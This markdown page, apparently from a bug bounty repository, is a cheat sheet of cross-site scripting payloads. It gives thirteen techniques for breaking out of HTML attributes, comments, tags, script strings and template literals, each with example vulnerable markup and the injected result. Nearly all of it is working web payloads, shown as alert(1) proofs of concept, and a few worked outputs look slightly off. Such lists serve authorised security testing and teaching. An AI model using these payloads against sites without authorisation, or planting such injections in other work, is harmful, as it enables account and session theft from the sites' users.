AllAboutBugBounty/XSS.md
Muhammad Daffa 74b4c4b2eb
XSS [4]
Add 3 tips
2020-09-14 10:38:20 +07:00

248 lines
4.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# XSS Payloads
1. Basic payload
```html
<script>alert(1)</script>
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>
```
2. Add ' or " to escape the payload from value of an HTML tag
```html
"><script>alert(1)</script>
'><script>alert(1)</script>
```
* Example source code
```html
<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
```
* After input the payload
```html
<input id="keyword" type="text" name="q" value=""><script>alert(1)</script>
```
3. Add --> to escape the payload if input lands in HTML comments.
```html
--><script>alert(1)</script>
```
* Example source code
```html
<!-- REFLECTED_HERE -->
```
* After input the payload
```html
<!-- --><script>alert(1)</script> -->
```
4. Add </tag> when the input inside or between opening/closing tags, tag can be <a>,<title,<script> and any other HTML tags
```html
</tag><script>alert(1)</script>
"></tag><script>alert(1)</script>
```
* Example source code
```html
<a class="item-pagination flex-c-m trans-0-4 active-pagination" href="https://target.com/1?status=REFLECTED_HERE">1</a>
```
* After input the payload
```html
<a class="item-pagination flex-c-m trans-0-4 active-pagination" href="https://target.com/1?status="></a><script>alert(1)</script>">1</a>
```
5. Use when input inside an attributes value of an HTML tag but > is filtered
```html
" onmouseover=alert(1)
" autofocus onfocus=alert(1)
```
* Example source code
```html
<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
```
* After input the payload
```html
<input id="keyword" type="text" name="q" value="" onmouseover=alert(1)">
```
6. Use </script> when input inside <script> tags
```html
</script><script>alert(1)</script>
```
* Example source code
```html
<script>
var sitekey = 'REFLECTED_HERE';
</script>
```
* After input the payload
```html
<script>
var sitekey = '</script>alert(1)</script>';
</script>
```
7. Use when input lands in a script block, inside a string delimited value.
```html
'-alert(1)-'
'/alert(1)//
```
* Example source code
```html
<script>
var sitekey = 'REFLECTED_HERE';
</script>
```
* After input the payload
```html
<script>
var sitekey = ''-alert(1)-'';
</script>
```
8. Same like Number 7. But inside a string delimited value but quotes are escaped by a backslash.
```html
\'alert(1)//
```
* Example source code
```html
<script>
var sitekey = 'REFLECTED_HERE';
</script>
```
* If we input payload '-alert(1)-' it will be like this
```html
<script>
var sitekey = '\'-alert(1)-\'';
</script>
```
The quotes are escaped by a backslash so we need to bypass them
* After input the payload
```html
<script>
var sitekey = '\\'alert(1)//';
</script>
```
9. Use when theres multi reflection in the same line of JS code
```html
/alert(1)//\
/alert(1)}//\
```
* Example source code
```html
<script>
var a = 'REFLECTED_HERE'; var b = 'REFLECTED_HERE';
</script>
```
* After input the payload
```html
<script>
var a = '/alert(1)//\'; var b = '/alert(1)//\';
</script>
```
10. Use when input inside a string delimited value and inside a single logical block like function or conditional (if, else, etc).
```html
'}alert(1);{'
\'}alert(1);{//
```
* Example source code
```html
<script>
var greeting;
var time = 1;
if (time < 10) {
test = 'REFLECTED_HERE';
}
</script>
```
* After input the payload
```html
<script>
var test;
var time = 1;
if (time < 10) {
test = ''}alert(1);{'';
}
</script>
```
> Payload number 2 uses when quote escaped by backslash
11. Use when input lands inside backticks delimited strings
```html
${alert(1)}
```
* Example source code
```html
<script>
var dapos = `REFLECTED_HERE`;
</script>
```
* After input the payload
```html
<script>
var dapos = `${alert(1)}`;
</script>
```
12. Uses when there is multiple reflections on same page. (Double Reflection)
```html
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
```
* After input the payload
```html
<!DOCTYPE html>
<html>
<body>
'onload=alert(1)><svg/1='
[...]
'onload=alert(1)><svg/1='
</body>
</html>
```
13. Uses when there is multiple reflections on same page. (Triple Reflection)
```html
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
```
* After input the payload
```html
<!DOCTYPE html>
<html>
<body>
*/alert(1)">'onload="/*<svg/1='
[...]
*/alert(1)">'onload="/*<svg/1='
[...]
*/alert(1)">'onload="/*<svg/1='
</body>
</html>
```
*Will be updated again!